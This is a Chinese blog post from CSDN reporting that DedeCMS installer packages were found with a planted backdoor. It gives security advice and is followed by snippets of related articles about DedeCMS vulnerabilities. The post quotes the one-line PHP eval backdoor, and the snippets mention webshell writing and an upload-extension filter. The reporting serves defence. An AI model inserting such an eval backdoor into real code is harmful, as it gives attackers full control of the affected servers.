织梦CMS建站系统被曝漏洞 几十万网站沦为木马网站

最新推荐文章于 2024-03-13 21:23:03 发布
最新推荐文章于 2024-03-13 21:23:03 发布
阅读量770 收藏 1
点赞数
文章标签: cms dedecms 织梦 wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guizhoumen/article/details/98178542
版权

最新消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

据第三方权威统计数据显示,目前约有 50 万网站使用该dedecms系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。

安全界人士分析发现,此类文件被植入一句后门代码“@eval (file_get_contents ('php://input'));”,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的 WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。

下面小熊优化的小编给出一个相关建议:

1、尽快转换系统,可以使用pageadmin、动易、wp这类保持续更新的cms系统、国内一些老牌的cms包括dedecms,phpcms、jtbc等已停止更新了,建议不要使用了。

2、尽量不要网上下载不知名的插件,尤其使用wp的网站,大多被黑的都是网上乱用插件导致的。

3、保持系统更新,官方更新的版本及时更新上,不要感觉现在功能够用了就不更新,有时候更新不仅仅是功能更新,也是安全上的更新。

guizhoumen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CmsEasy7.6.3.2逻辑漏洞
西电卢本伟的博客
04-22 4899
cmseasy、逻辑漏洞
漏洞复现--织梦CMS_V5.7任意用户密码重置漏洞
HengMengSec的博客
08-16 2056
织梦内容管理系统DeDeCMS)以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网站管理系统,它在多年的发展中取得了显著进步,无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网站、个人网站、企业和学习网站建设。在中国,DedeCMS被认为是最受欢迎的CMS系统之一。但是,最近发现该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断,攻击者可以利用弱类型比较来绕过安全措施。
DedeCms织梦系统漏洞复现
最新发布
LIU6636LIU的博客
03-13 1924
1 部署好之后发现系统默认管理路径是dede,登陆管理后台可以通过地址然后有dedecms安全提示直接打开根目录修改dede文件夹为LYP重新进去管理员后台对数据进行还原看一下网站的地址接着生成新的网站然后即可访问网站CMS搭建完毕首先打开后台管理页面开启会员功能这样就可以注册一个账户。
织梦网站漏洞烦死人!做SEO的网站不绕过真是不行
q1256722227的博客
10-29 817
这是昨天的一个客户聊天,网站织梦做的,可能服务器也没有维护好,所以一直以来都有网站速度慢,偶尔打不开的问题。最近更是麻烦,先是后台无法登陆,后来后台直接404,现在又是网站加了友情链接更新之后首页不显示。 于是就有了下边的对话: 客户:我用的是景安的服务器 我:空间应该没问题的。织梦网站的通病,他是通过机器轮番查询漏洞的。找到某个网站漏洞,然后入侵。1、如果服务器权限设置得当,经常安全维护,可...
织梦guestbook.php漏洞,织梦dedecms漏洞大全 | 志博日记
weixin_42512249的博客
03-12 866
1.dedecms文件任意上传漏洞漏洞一文件位置:/dede/media_add.php找到64行$filename = $savePath."/".$filename;改成$filename = $savePath."/".$filename; if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA...
织梦cms 技术导航网站源码附带一万数据
08-20
织梦CMSDedeCMS)是一款广泛应用于网站建设的开源内容管理系统,它以其强大的模板引擎和易用性赢得了众多用户的喜爱。本技术导航网站源码包含了完整的织梦CMS框架,并附带了一万条预填充的数据,这使得用户可以...
汇成政府建站CMS系统-Asp
06-13
汇成政府建站CMS系统是以asp+access进行开发的政府网站系统。 我们调研了政府网站的建设框架与方式,设计了一套了专门给政府网站用的建站模板,此系统的功能,会根据大家的使用反应情况,做出相应的升级,希望大家...
易优cms企业建站系统(含小程序)源代码
03-18
易优cms企业建站系统是由php+mysql开发的一套专门用于中小企业网站建设的开源cms。 可以用来快速建设一个企业网站( PC,手机,微信都可以访问)。后台操作简单,维护方便。 易优cms企业建站系统主要特点: 1、后台...
MCMS铭飞cms建站系统-其他
06-12
MCMS铭飞cms建站系统完整开源!基于SpringBoot 2架构,前端基于vue、element ui。每月28定期更新版本,为开发者提供上百套免费模板,同时提供适用的插件(文章、商城、微信、论坛、会员、评论、支付、积分、工作流、...
小兵建站CMS企业网站模板 v2.0.1119
12-03
小兵建站CMS V2.0(内容管理系统,全新界面),基于OneThink开源框架,和超过300家以上网站建设客户进行了深度的合作与需求沟通,经过了一年时间的研发,打造了国内最简洁好用、易于操作的网站管理后台。
CMS漏洞总结
include_voidmain的博客
08-01 4743
CMS漏洞总结
漏洞情报】复现任务
liangtaiwei的博客
12-13 2454
一、漏洞概述 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS
织梦漏洞修复大全(使用织梦建站,有许多漏洞)现在整理了一些
sy_3714的博客
08-17 2440
文章目录使用织梦建站,阿里云中反馈了许多漏洞dedecms /include/payment/alipay.php支付模块注入漏洞修复方案织梦dedecms安全漏洞之/include/common.inc.php漏洞解决办法dedecms任意文件上传漏洞(select_soft_post.php)织梦cms/include/uploadsafe.inc.php漏洞修复方法 使用织梦建站,阿里云中反馈了许多漏洞 现在给大家整理一下织梦漏洞 dedecms /include/payment/alipay.ph
dedecms织梦日志暴露后台地址漏洞BUG修复
09-07 548
然后修改/include/common.inc.php中DEDEDATA变量,将:define('DEDEDATA', DEDEROOT.'/data');修改tplcache缓存文件目录:登陆后台 > 系统 > 系统基本参数 > 性能选项,将模板缓存目录值改为 /../data/tplcache。首先用FTP或远程登陆的方式将data/mysql_error_trace.inc更名成 mysql_error_你喜欢的任意字符.inc。通过FTP将/data/文件夹移至web根目录的上一级目录;
织梦dedecms程序安全漏洞include/common.inc.php漏洞解决方法
winkexin的博客
03-23 428
1.受影响版本织梦dedecms 5.7、5.6、5.5。2.漏洞文件/include/common.inc.php 3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量。3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量。2.通过此漏洞进行各种越权操作构造漏洞直接写入webshell后门。2.漏洞文件/include/common.inc.php。1.受影响版本DEDECMS 5.7、5.6、5.5。1.黑客可以通过此漏洞来重定义数据库连接。文章到此为止 请自行完善吧。
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)
末初的CSDN博客
05-18 2425
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
织梦漏洞利用
weixin_53210070的博客
12-14 1550
Dedecms网站建立 php打开网站,开始安装 漏洞利用原理 dedecms系统中使用了SQL语句防注入功能引了的安全警告。在自定义模模型中使用了union|sleep|benchmark|load_file|outfile之一都会引发这个警告,此外采集的内容,如果有‘union 这类语法也会出现在这个警告。解决办法就是把安全检查关掉,打开include下面的dedesql.class.php 和dedesqli.class.php,$this->...
织梦网站-漏洞复现+漏洞影响范围
Woolemon的博客
11-01 1342
简介 织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统漏洞复现环境 PHP 5.6 Apache 2.4.39 MySQL 5.7 DeDeCMS V5.7 SP2正式版(2018-
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1)
午夜安全
11-17 4318
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1) 在Windows server2008服务器上安装phpstudy,将dedecms网站源码复制到C:\phpStudy\PHPTutorial\WWW\下,启动phpstudy,运行模式选择系统服务,安装成功后,可以在浏览器访问服务器ip地址,如下所示:访问如下安装地址,提示删除install/install_lock.txt。删除后,可以正常访问,之后按照提示安装完成即可。安装完成后,访问首页。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值